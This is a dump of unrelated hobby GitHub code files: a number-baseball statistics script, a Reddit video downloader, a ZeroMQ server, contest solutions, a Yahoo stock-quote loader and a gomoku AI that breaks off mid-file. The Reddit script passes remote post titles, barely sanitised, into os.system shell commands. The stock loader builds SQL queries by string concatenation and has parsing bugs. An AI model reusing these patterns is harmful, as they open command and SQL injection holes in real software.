guess_log.append(0)\n list_of_guess_log.append(guess_log)\n end_func()\n print(\"%d번째 게임 끝\" % (i+1))\n attempts = pd.DataFrame(list_of_attempts, columns=['attempt'])\n total_guess = pd.DataFrame(list_of_guess_log, columns=['0회', '1회', '2회', '3회', '4회', '5회', '6회', '7회', '8회', '9회', '10회', '11회', '12회', '13회'])\n total_guess.loc['Avrg.'] = total_guess.mean()\n\n return attempts, total_guess\n\n\nVer0_attempts, Ver0_total_guess = auto_execute(AutoNumberBaseball.ProgramStart, AutoNumberBaseball.ProgramEnd, 10000)\nVer1_attempts, Ver1_total_guess = auto_execute(AutoNumberBaseballVer1.ProgramStart, AutoNumberBaseballVer1.ProgramEnd, 10000)\n\nprint(\"-\"*100)\nprint(\"\\n\\nVer0의 평균 시도 횟수: %.4f\\nVer1의 평균 시도 횟수: %.4f\" % (np.mean(Ver0_attempts.attempt), np.mean(Ver1_attempts.attempt)))\n\nlresult = stats.levene(Ver0_attempts.attempt, Ver1_attempts.attempt)\nprint('\\n<유의수준 0.05>\\n등분산 검정 결과(F값) : %.4f \\np-value : %.4f' % (lresult))\n\n\ntresult = stats.ttest_ind(Ver0_attempts, Ver1_attempts, equal_var=True)\nprint('\\n\\n<유의수준 0.05>\\n독립표본 등분산 t검정 결과(t값) : %.8f \\np-value : %.8f' % (tresult))\n\ntresult2 = stats.ttest_ind(Ver0_attempts, Ver1_attempts, equal_var=False)\nprint('\\n\\n<유의수준 0.05>\\n독립표본 이분산 t검정 결과(t값) : %.8f \\np-value : %.8f' % (tresult2))\n\n # plt.plot([0,1,2,3,4,5,6,7,8,9], list_of_guess_log[0])\n # plt.xlabel('Attempts')\n # plt.ylabel('Possible Answer')\n # plt.title('Possible Answer Log of Ver 0')\n # plt.savefig('/workspace/Number_Baseball/UpgradeProcess/Ver_0')\nprint(\"\\n\")\nprint(Ver0_total_guess.loc['Avrg.'])\nprint(\"\\n\")\nprint(Ver1_total_guess.loc['Avrg.'])\nprint(\"\\n\")\nplt.plot([0,1,2,3,4,5,6,7,8,9,10,11,12,13], Ver0_total_guess.loc['Avrg.'].tolist(), color='b', label='Ver0')\nplt.plot([0,1,2,3,4,5,6,7,8,9,10,11,12,13], Ver1_total_guess.loc['Avrg.'].tolist(), color='r', label='Ver1')\nplt.xlabel('Attempts')\nplt.ylabel('Answers')\nplt.title('Ver0 and 1 Average Number of Answers: 10,000 repetitions each')\nplt.grid()\nplt.legend()\n\nplt.savefig('/workspace/Number_Baseball/UpgradeProcess/Ver_0_1_Guess_Log')","repo_name":"shyoon515/Number_Baseball","sub_path":"UpgradeProcess/Ver0_vs_Ver1/CompareVer0andVer1.py","file_name":"CompareVer0andVer1.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69883886275","text":"import requests\nimport os\nimport json\n\ndef clean_videos_folder():\n os.system(\"rm videos/*\")\n\ndef download_videos():\n URL = \"https://www.reddit.com/r/oddlysatisfying/top.json?sort=top&t=day&limit=10\"\n res = requests.get(URL, headers={'User-agent': 'reddit scrapper'})\n json_res = res.json()\n manifest_json = {\"data\": []}\n\n for idx in range(10):\n try:\n submission_data = json_res['data']['children'][idx]['data']\n if submission_data['is_video'] == False:\n continue\n if submission_data['secure_media'] == None:\n continue\n if submission_data['secure_media']['reddit_video'] == None:\n continue\n if submission_data['secure_media']['reddit_video']['fallback_url'] == None:\n continue\n if submission_data['secure_media']['reddit_video']['duration'] == None:\n continue\n\n fallback_url = submission_data['secure_media']['reddit_video']['fallback_url']\n title = submission_data['title']\n\n r = requests.get(fallback_url, stream=True)\n formatted_title = title.replace(' ', '_').replace('(', '').replace(')', '').lower()\n with open(f\"videos/{formatted_title}.mp4\", 'wb') as f:\n for chunk in r.iter_content(chunk_size = 1024*1024):\n if chunk:\n f.write(chunk)\n\n filename = f\"{formatted_title}.mp4\"\n new_file_name = f\"output.{filename}\"\n os.system(f\"ffmpeg -i videos/{filename} videos/{new_file_name}\")\n os.system(f\"rm videos/{filename}\")\n\n manifest_json[\"data\"].append({\n \"filename\": filename,\n \"title\": title,\n })\n except Exception as e:\n print(idx)\n\n with open(\"videos/manifest.json\", \"w\") as f:\n json.dump(manifest_json, f)\n\ndef main():\n clean_videos_folder()\n download_videos()\n\nif __name__ == '__main__':\n main()","repo_name":"RobinChailley/reddit-twitter-auto-publisher","sub_path":"download_videos.py","file_name":"download_videos.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30532946188","text":"# Example based on \n# https://zeromq.org/languages/python/\n\nimport time\nimport zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind('tcp://*:5555')\n\nwhile True:\n\n try:\n \n message = socket.recv()\n print('Received request:', message)\n\n number = float(message)\n response = b'ok' if number < 70 else b'high'\n\n time.sleep(1)\n\n socket.send(response)\n\n except KeyboardInterrupt:\n print('\\nStopping the server due to keyborard interrupt')\n break\n","repo_name":"semeniuta/ntnu-faai","sub_path":"communication/zmq_server.py","file_name":"zmq_server.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23604041491","text":"\r\nfilename = 'B-large'\r\n\r\ndef gcd(a, b):\r\n if a > b: a, b = b, a\r\n while a != 0:\r\n a, b = b % a, a\r\n return b\r\n\r\nfin = open(filename + '.in')\r\nfout = open(filename + '.out', 'w')\r\ncases = int(fin.readline().strip())\r\nfor case in xrange(1, cases + 1):\r\n t = [int(x) for x in fin.readline().strip().split()]\r\n n = t.pop(0)\r\n t.sort()\r\n s = t[1] - t[0]\r\n for i in xrange(1, n - 1):\r\n s = gcd(s, t[i + 1] - t[i])\r\n ans = t[0] % s\r\n if ans != 0: ans = s - ans\r\n fout.write('Case #%d: %d\\n' % (case, ans))\r\nfin.close()\r\nfout.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_54/60.py","file_name":"60.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44290536860","text":"'''\n풀이 및 접근방법\n 1. 배열로 초기화하기 위해, 각각의 지점 s, a, b에 1씩을 뺀다.\n 2. 각각의 연결지점으로 된 fares를 순회하며, 각 지점에서 다른 지점과의 거리가 담긴 배열 graph를 세팅한다.\n 이 때, 직접적으로 연결되지 않으면 거리를 inf로 세팅한다.\n 3. 어느 지점에서 다른 지점으로 이동하는 최단 거리가 담긴 모든 배열을 min_graph에 담아야 한다.\n 이를 위해, 모든 지점을 순회하며 다익스트라 알고리즘을 이용해 최단거리를 구한다.\n 4. 모든 지점을 순회하며, s에서 해당 지점을 찍은 후 a, b로 각각 가는 거리의 합 중 최소값을 구해 리턴한다.\n\n 다익스트라\n 1. 자신에서 자신으로의 거리는 0, 나머지 지점과의 거리를 inf로 세팅해 dist에 저장한다.\n 2. 시작지점과 거리를 heapq를 이용해 q에 세팅한다.\n 3. heapq를 순회하며, 비용이 작은 노드를 먼저 선택한다.\n 4. 만약 선택된 노드의 거리값이 dist에 저장된 거리값보다 작을 때에 다음을 진행한다.\n 5. 해당 지점에서 다른 지점으로 가는 모든 거리값을 구해, 그 거리가 dist에 저장된 거리값보다 작으면 dist에 갱신한다.\n 6. 다음 인접한 노드를 고려하기 위해 새로 구해진 거리값과 노드 인덱스를 q에 세팅한다.\n'''\n\n\nfrom math import inf\nfrom heapq import heappush, heappop\n\n\ndef dijkstra(n, graph, start):\n dist = [inf for _ in range(n)] # start 기준의 거리행렬\n dist[start] = 0 # 자기 자신으로 가는 간선은 0\n q = []\n heappush(q, [dist[start], start]) # 거리와 노드를 함께 큐에 삽입\n while q: # (비용이 작은 노드를 먼저 선택)\n cur_dist, cur_idx = heappop(q)\n if dist[cur_idx] >= cur_dist: # start에서 cur_dest로 가는 거리가\n for i in range(n): # 이미 저장된 거리보다 작을 때만 진행\n new_dist = cur_dist + graph[cur_idx][i]\n if new_dist < dist[i]: # cur_dest를 거쳐 i로 가는 거리가\n dist[i] = new_dist # 이미 저장된 거리보다 작으면 갱신\n heappush(q, [new_dist, i]) # 다음 인접한 노드를 고려하기 위해 큐에 삽입\n return dist\n\n\ndef solution(n, s, a, b, fares):\n s, a, b = s - 1, a - 1, b - 1 # 0부터 시작하는 인덱스\n graph = [[inf] * n for _ in range(n)]\n for fare in fares:\n u, v, w = fare\n graph[u - 1][v - 1] = graph[v - 1][u - 1] = w\n # 다익스트라\n # 모든 노드에 대해 다익스트라를 수행하고,\n # 반환된 1차원 거리행렬을 append 해줌\n min_graph = []\n for i in range(n):\n min_graph.append(dijkstra(n, graph, i))\n # 출발점을 기준으로 어떤 지점 k를 거쳐 각각 a와 b로 가는 최소 비용을 탐색\n ans = inf\n for k in range(n):\n ans = min(ans, min_graph[s][k] + min_graph[k][a] + min_graph[k][b])\n\n return ans","repo_name":"Slowth-KIM/crewcrew-coding-test-study","sub_path":"박한결/카카오기출문제/합승택시요금.py","file_name":"합승택시요금.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"8386792128","text":"import ystockquote\nimport sqlite3\nimport sys\nimport datetime\nimport urllib2\nimport Common\nimport time\nimport httplib\nimport string\nimport os\nimport socket\n\n\nsetting = {\n 'db' : 'us.db',\n 'stockfile' : 'nasdaq.csv,amex.csv,nyse.csv',\n}\n\n\ndef SwitchMarketCap(mc):\n c = mc[-1].upper()\n try:\n v = string.atof(mc[:-1])\n except:\n return 10*1000*1000*1000*1000\n \n if c=='K':\n v = v*1000\n if c=='M':\n v = v*1000*1000\n if c=='B':\n v = v*1000*1000*1000\n return v\n \n\ndef LoadStockList():\n stocks = []\n sfs = setting['stockfile'].split(',')\n for sf in sfs:\n f = open('data/'+sf)\n line = f.readline()\n while line:\n items = line.split(',')\n symbol = items[0].strip('\"')\n if (symbol.upper()!='SYMBOL') and (symbol.find('^')<0) and (symbol.find('/')<0):\n stocks.append(symbol)\n line = f.readline()\n f.close()\n \n return stocks\n \n \n\n \n\ndef LoadQuotaIntoDB(symbol, quota, dbcursor):\n for key in quota:\n data = quota[key]\n volume = string.atof(data[\"Volume\"])\n turnover = (string.atof(data[\"High\"]) + string.atof(data[\"Low\"]))/2 * volume\n data[\"Turnover\"] = str(turnover)\n open = string.atof(data[\"Open\"])\n close = string.atof(data[\"Close\"])\n #if (open == 0) or (turnover == 0):\n if (open == 0) or (volume == 0):\n data[\"Illiq\"] = \"0\"\n else:\n #data[\"Illiq\"] = str(abs(close-open)/open/turnover)\n data['Illiq'] = str(abs(close-open)/open/volume)\n\n sql = \"insert into quotation (id, date, open, close, adjclose, high, low, volume, turnover, illiq) values \"\n sql += \"('\"+setting[\"google\"]+symbol+\"','\"+key+\"',\"+data[\"Open\"]+\",\"+data[\"Close\"]+\",\"+data[\"Adj Close\"]+\",\"+data[\"High\"]+\",\"+data[\"Low\"]+\",\"+data[\"Volume\"]+\",\"+data[\"Turnover\"]+\",\"+data[\"Illiq\"]+\")\" \n dbcursor.execute(sql)\n realquota = ystockquote.get_all(symbol)\n mc = realquota['market_cap']\n try:\n pb = string.atof(realquota['price_book_ratio'])\n except:\n pb = 1000\n sql = 'update quotation set pb='+str(pb)+', currcapital_a='+str(SwitchMarketCap(mc))+' where id=\"' + symbol +'\"'\n dbcursor.execute(sql)\n \n return\n\n\ndef FetchQuotaFromYahoo(stocks):\n\n print(\"fetch data from yahoo for today\")\n \n total = str(len(stocks))\n count = 0\n nSuccess = 0\n nNodata = 0\n nFail = 0\n\n quotas = []\n for symbol in stocks:\n\n count += 1\n errmsg = str(count)+\"/\"+total+\" : \" + symbol\n nRetry = 12\n nTimeout = 10\n while True:\n try:\n print(errmsg)\n quota = ystockquote.get_all(symbol)\n if quota['last_trade_date'].upper() == 'N/A':\n print('fetch failed: data is N/A!')\n nFail += 1\n else:\n quota['last_trade_date'] = time.strftime('%Y-%m-%d', time.strptime(quota['last_trade_date'].strip('\"'), '%m/%d/%Y'))\n date = quota['last_trade_date']\n quota['extra'] = ystockquote.get_historical_prices(symbol, date, date)[date]\n nSuccess += 1\n quotas.append(quota)\n break\n except urllib2.HTTPError as httpe:\n print('fetch failed: '+str(httpe))\n nFail += 1\n break\n except urllib2.URLError as urle:\n print('fetch failed: '+str(urle))\n pass\n except socket.timeout as toe:\n print('fetch failed: '+str(toe))\n pass\n except socket.error as se:\n print('fetch failed: '+str(se))\n pass\n \n if nRetry == 0:\n nFail += 1\n break\n else:\n time.sleep(nTimeout)\n nRetry = nRetry - 1\n \n\n \n print(\"Fetch stocks, \"+str(nSuccess)+\" done, \"+str(nNodata)+\" no data found, \"+str(nFail)+\" failed.\")\n return quotas\n\ndef LoadQuotasIntoDB(quotas):\n db = sqlite3.connect(setting['db'])\n cu = db.cursor()\n \n try:\n trade_date = quotas[0]['last_trade_date']\n sql = 'delete from quota where date=\"'+trade_date+'\"'\n cu.execute(sql)\n \n for quota in quotas:\n close = string.atoi(quota['extra']['Close'])\n open = string.atoi(quota['extra']['Open'])\n turnover = string.atoi(quota['extra']['Volume'])\n illiq = abs(close-open)/open/turnover\n if quota['stock_exchange'].lower().index('nasdaq') >= 0:\n se = 'NASDAQ'\n if quota['stock_exchange'].lower().index('nasdaq') >= 0:\n se = 'NYSE'\n \n sql = 'insert into quota (id, date, open, close, adjclose, high, low, volume, turnover, illiq, pb, mcap, stock_exchange) values '\n sql += '('+quota['symbol']+',\"'+quota['last_trade_date']+'\",'+quota['extra']['Open']+','+quota['extra']['Close']+','+quota['extra']['Adj Close']+\",\"+quota['extra']['High']+\",\"+quota['extra']['Low']+','+quota['extra']['Volume']+','+quota['extra']['Volume']+','+str(illiq)+','+quota['price_book_ratio']+','+SwitchMarketCap(quota['market_cap'])+',\"'+se+'\")'\n cu.execute(sql)\n \n \n finally:\n cu.close()\n db.close()\n\ndef main():\n\n stocks = LoadStockList()\n quotas = FetchQuotaFromYahoo(stocks)\n LoadQuotasIntoDB(quotas)\n\n return\n\nmain()\n","repo_name":"szfree/illiq","sub_path":"fetch_us_quota.py","file_name":"fetch_us_quota.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28263952640","text":"# Given a string s, rearrange the characters of s so that any two adjacent characters are not the same.\n\n# Return any possible rearrangement of s or return \"\" if not possible.\n# Example 1:\n\n# Input: s = \"aab\"\n# Output: \"aba\"\n# Example 2:\n\n# Input: s = \"aaab\"\n# Output: \"\"\n\n# fastest solution\nfrom collections import Counter\nimport heapq\n\n\nclass Solution:\n def reorganizeString(self, s: str) -> str:\n heap = []\n for key, val in Counter(s).items():\n heapq.heappush(heap, (-val, key))\n res = \"\"\n while len(heap) > 1:\n freq1, char1 = heapq.heappop(heap)\n freq2, char2 = heapq.heappop(heap)\n res += char1 + char2\n if freq1 + 1 < 0:\n heapq.heappush(heap, (freq1 + 1, char1))\n if freq2 + 1 < 0:\n heapq.heappush(heap, (freq2 + 1, char2))\n if heap:\n freq, char = heapq.heappop(heap)\n if freq < -1:\n return \"\"\n else:\n res += char\n return res\n\n# implementation with priority queue\n# from queue import PriorityQueue\n# class Solution:\n# def reorganizeString(self, s: str) -> str: \n# res = \"\"\n# pq = PriorityQueue()\n# for key, val in Counter(s).items():\n# pq.put((-val,key))\n# while pq.qsize() > 1:\n# freq1,char1 = pq.get()\n# freq2,char2 = pq.get()\n# res += char1 + char2\n# if freq1 + 1 < 0:\n# pq.put((freq1 +1,char1))\n# if freq2 + 1 < 0:\n# pq.put((freq2 +1,char2))\n# if pq.qsize():\n# freq,char = pq.get()\n# if freq < -1:\n# return \"\"\n# else:\n# res += char\n# return res\n\n\nsd = Solution()\nprint(sd.reorganizeString(\"aab\"))\nprint(sd.reorganizeString(\"aaab\"))\nprint(sd.reorganizeString(\"vvvlo\"))\nprint(sd.reorganizeString(\"bfrbs\"))\nprint(sd.reorganizeString(\"ogccckcwmbmxtsbmozli\"))\n","repo_name":"yogeswarl/leetcode_problems","sub_path":"Reorganize_String.py","file_name":"Reorganize_String.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74523619395","text":"import time\r\nimport sys\r\nimport colored\r\nimport keyboard\r\n\r\n#印出棋盤,包括要特別標記的格子(以其橫排數chosenROWNUM和其直排數chosenPIECENUM表示)\r\ndef printBoard(board,width,chosenROWNUM=-1,chosenPIECENUM=-1):#若不須標記格子,則原本要特別標記的格子之座標預設為(-1,-1),程式就不會找到對應的格子特別標示了\r\n print(\"\\t\",end=\"\")\r\n for i in range(size):\r\n print(\" \"+str(i+1)+\" \",end=\" \"*(width-(len(str(i+1))-1)))#印出直排行數\r\n print(\"\\n\")#換兩行==print()print()\r\n #跑遍各排的各顆棋子\r\n for rowNum in range(size):\r\n print(str(rowNum+1),end=\"\\t\")#印出橫排行數\r\n for pieceNum in range(size):\r\n piece=board[rowNum][pieceNum]\r\n #針對玩家棋子、AI棋子、或空格,印出不同的前景色\r\n if piece==\"O\":\r\n THISfcolor=colored.fg(\"green\")\r\n elif piece==\"X\":\r\n THISfcolor=colored.fg(\"red_1\")\r\n elif piece==\".\":\r\n THISfcolor=fcolor\r\n #若該格是要特別標記的格子,則改變其背景色\r\n if rowNum==chosenROWNUM and pieceNum==chosenPIECENUM:\r\n THISbcolor=markedcolor\r\n else:\r\n THISbcolor=bcolor\r\n print(THISfcolor+THISbcolor+\" \"+piece+\" \"+reset,end=\"\")#印出一格棋子\r\n if not pieceNum==size-1: #不是最後一個棋子就再加上空白\r\n print(fcolor+bcolor+\" \" * width+reset,end=\"\")\r\n print()\r\n\r\n if not rowNum==size-1: #不是最後一排就再加上一行空白!\r\n print(\"\\t\"+fcolor+bcolor+\" \"*(width*(size-1)+size*(1+2))+reset)\r\n#設定難度,即AI的搜尋深度\r\n#0:搜尋深度淺,花費時間少;1:搜尋深度深,花費時間多\r\ndef setDifficulty():\r\n print(\"plz choose the difficulty.(0:AI's stupid while spending shorter time\\t/\\t1:AI's smart while spending more time)\")\r\n while True:\r\n a=input()\r\n try:\r\n a=int(a)\r\n except ValueError:\r\n print(\"not num!\")\r\n continue\r\n if a==0:\r\n return 6\r\n elif a==1:\r\n return 7\r\n else:\r\n print(\"plz enter 0 or 1.\")\r\n continue\r\n#設定棋盤大小\r\ndef setSize():\r\n print(\"plz enter the size of board.(n in size(nxn))(allowed size=5 to 20)\")\r\n while True:\r\n a=input()\r\n try:\r\n a=int(a)\r\n except ValueError:\r\n print(\"not num!\")\r\n continue\r\n if a>20:\r\n print(\"too BIG!!!\")\r\n continue\r\n elif a<5:\r\n print(\"too SMALL!!!\")\r\n continue\r\n return a\r\n#清空畫面(感謝徐晧倫)\r\ndef clear():\r\n print(\"\\n\"*100)\r\n#玩家下棋\r\ndef player():\r\n \r\n def getPlayerInput(x,y):#讓玩家調整要下棋的位置並等待按下enter\r\n while 1:\r\n print(\"plz choose ur pos.(Press the arrow keys to choose the position u like. Then submit it by pressing enter.)\\n\\t\\t(press P should the board need reprinting.)\")\r\n while 1:#等待玩家按下按鍵\r\n if keyboard.is_pressed(77) and x+1=0: #if left arrow is pressed\r\n x-=1\r\n break\r\n if keyboard.is_pressed(72) and y-1>=0: #if up arrow is pressed\r\n y-=1\r\n break\r\n if keyboard.is_pressed(80) and y+1alpha and checkAplhaBeta:\r\n cut=True\r\n break\r\n elif who==\"playerAI\" and beta=checkDepth:#結束搜尋,傳回分數\r\n return pos\r\n else:\r\n return AllCheck(\"AI\",depth+1,aWholeNewBoard,checkDepth,onlyCheck,beta,checkAplhaBeta)\r\n elif who==\"AI\":\r\n if end or checkBoardFull(aWholeNewBoard) or depth+1>=checkDepth:#結束搜尋,傳回分數\r\n return pos\r\n else:\r\n return AllCheck(\"playerAI\",depth+1,aWholeNewBoard,checkDepth,onlyCheck,beta,checkAplhaBeta)\r\n\r\n#直排\r\ndef vertical(b,pos,who,depth,onlyCheck):\r\n for x in range(size):\r\n line = [b[y][x] for y in range(size)]\r\n piecePos=[(y,x) for y in range(size)]\r\n line = \"\".join(line)\r\n\r\n pos,end=analyze(line,b,piecePos,pos,who,depth,onlyCheck)\r\n return pos,end\r\n#橫排\r\ndef horizontal(b,pos,who,depth,onlyCheck):\r\n for y in range(size):\r\n line = [b[y][x] for x in range(size)]\r\n piecePos=[(y,x) for x in range(size)]\r\n line = \"\".join(line)\r\n\r\n pos,end=analyze(line,b,piecePos,pos,who,depth,onlyCheck)\r\n return pos,end\r\n#斜排\r\ndef slideUP(b,pos,who,depth,onlyCheck):\r\n for k in range(0+4,(size*2-1)-4):\r\n line = [b[y][x] for x in range(size) for y in range(size) if x+y==k]\r\n piecePos=[(y,x) for x in range(size) for y in range(size) if x+y==k]\r\n line = \"\".join(line)\r\n \r\n pos,end=analyze(line,b,piecePos,pos,who,depth,onlyCheck)\r\n return pos,end\r\n#斜排\r\ndef slideDOWN(b,pos,who,depth,onlyCheck):\r\n for k in range((-(size-1))+4,(size)-4):\r\n line = [b[y][x] for x in range(size) for y in range(size) if x-y==k]\r\n piecePos=[(y,x) for x in range(size) for y in range(size) if x-y==k]\r\n line = \"\".join(line)\r\n\r\n pos,end=analyze(line,b,piecePos,pos,who,depth,onlyCheck)\r\n return pos,end\r\n#分析情勢再加減分數\r\ndef analyze(line,b,piecePos,pos,who,depth,onlyCheck):\r\n #playerAI = O AI = X\r\n \r\n\r\n s,e=\"X\",\"O\"\r\n\r\n\r\n how=(1/10)**depth#越下層之分數越接近0,較不會影響總分\r\n checkend=False\r\n\r\n #判斷情勢\r\n if e*5 in line:\r\n if depth==0 and onlyCheck:\r\n gameover(\"win\")#玩家贏了\r\n pos-=10000000000 * how\r\n print(\"too bad\")\r\n checkend=True\r\n if e*4 in line:\r\n start=line.find(e*4)-1\r\n end=start+5\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" or endPiece==\".\":\r\n pos-=10000000 * how\r\n\r\n \r\n if e*3 in line:\r\n start=line.find(e*3)-1\r\n end=start+4\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=1000000 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos-=5000 * how\r\n\r\n \r\n if e*2 in line:\r\n start=line.find(e*2)-1\r\n end=start+3\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=100 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos-=50 * how\r\n\r\n \r\n if e*1 in line:\r\n start=line.find(e*1)-1\r\n end=start+2\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=3 * how\r\n elif startPiece==\".\":\r\n pos-=1 * how\r\n elif endPiece==\".\":\r\n pos-=1 * how\r\n\r\n\r\n\r\n if s*5 in line:\r\n if depth==0 and onlyCheck:\r\n gameover(\"lose\")#AI贏了\r\n pos+=10000000000 * how\r\n print(\"too good\")\r\n checkend=True\r\n if s*4 in line:\r\n start=line.find(s*4)-1\r\n end=start+5\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos+=10000000 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos+=5000 * how\r\n\r\n \r\n if s*3 in line:\r\n start=line.find(s*3)-1\r\n end=start+4\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos+=1000 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos+=10 * how\r\n\r\n \r\n if s*2 in line:\r\n start=line.find(s*2)-1\r\n end=start+3\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos+=5 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos+=2 * how\r\n\r\n\r\n if s*1 in line:\r\n start=line.find(s*1)-1\r\n end=start+2\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos+=2 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos+=1 * how\r\n\r\n\r\n\r\n\r\n if e+\".\"+e in line:\r\n start=line.find(e+\".\"+e)-1\r\n end=start+4\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=500000 * how\r\n elif startPiece==\".\":\r\n pos-=5000 * how\r\n elif endPiece==\".\":\r\n pos-=5000 * how\r\n\r\n\r\n\r\n\r\n \r\n if e+e+\".\"+e in line:\r\n start=line.find(e+e+\".\"+e)-1\r\n end=start+5\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=1000000 * how\r\n elif startPiece==\".\":\r\n pos-=10000 * how\r\n elif endPiece==\".\":\r\n pos-=10000 * how\r\n if e+\".\"+e+e in line:\r\n start=line.find(e+\".\"+e+e)-1\r\n end=start+5\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=1000000 * how\r\n elif startPiece==\".\":\r\n pos-=10000 * how\r\n elif endPiece==\".\":\r\n pos-=10000 * how\r\n if e+e+\".\"+e+e in line:\r\n\r\n \r\n pos-=10000000 * how\r\n if e+e+e+\".\"+e in line:\r\n \r\n pos-=10000000 * how\r\n if e+\".\"+e+e+e in line:\r\n\r\n \r\n pos-=10000000 * how\r\n\r\n\r\n\r\n\r\n return pos,checkend\r\n#AI下棋\r\ndef ai(positions,board):\r\n if positions!=dict():\r\n besty,bestx=positions[max(positions.keys())]\r\n\r\n board[besty][bestx]=\"X\"\r\n\r\n else:\r\n print(\"the AI of this game is too stupid to decide where to place its pawn.\")\r\n print(\"So it's time for u to defeat it.\")\r\n return board\r\n#遊戲結束\r\ndef gameover(text):\r\n if text==\"win\":\r\n print(\"U win!!!\")\r\n elif text==\"lose\":\r\n print(\"haha u lose!!!\")\r\n elif text==\"tie\":\r\n print(\"the board is full!!!\")\r\n print(\"LOOK WHAT U'VE DONE!!!\")\r\n time.sleep(5)\r\n print(\"end!\")\r\n sys.exit()#end script\r\n\r\n\r\n#初始化\r\nk=7#default\r\nk=setDifficulty()\r\nsize=setSize()\r\nCheckDepth=1\r\nboard=[[\".\" for i in range(size)] for i in 